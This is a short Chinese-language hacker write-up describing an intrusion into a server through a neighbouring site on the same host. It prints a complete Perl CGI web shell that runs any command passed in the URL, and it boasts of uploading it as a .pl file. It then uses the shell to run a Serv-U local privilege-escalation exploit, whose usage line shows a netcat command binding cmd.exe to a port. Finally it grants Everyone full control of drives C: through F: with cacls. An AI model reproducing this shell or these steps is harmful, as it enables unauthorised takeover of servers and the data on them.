剑走偏锋——灵巧的旁注攻击

核心提示： #!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, "Content-type: text/html", 27);$_ = $ENV{QUERY_STRING};s/%20/ /ig;s/%2f///ig;$execthis

#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html
", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f///ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>
", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "
</PRE></HTML>
", 17);
close(STDERR);
close(STDOUT);
exit;

我用过最好的 cgishell ，保存为一个 cgi 文件执行，晕......居然不支持！一阵阵郁闷袭来，2 秒钟的郁闷后，想到还有一线希望，那就是pl ，我们还没有试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 http://anyhost//cmd.pl?dir ，我的天啊！！

显示"拒绝访问"，终于可以执行了！太兴奋了，马上提交：

返回： Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

嘻嘻～～现在是 IUSR 权限，那又怎么样？看你这次还不死？提交：

http://anyhost//cmd.pl?d:userinsu.exe "cacls.exe c: /E /T /G everyone:F"

http://anyhost//cmd.pl?d:userinsu.exe "cacls.exe d: /E /T /G everyone:F"

http://anyhost//cmd.pl?d:userinsu.exe "cacls.exe e: /E /T /G everyone:F"

http://anyhost//cmd.pl?d:userinsu.exe "cacls.exe f: /E /T /G everyone:F"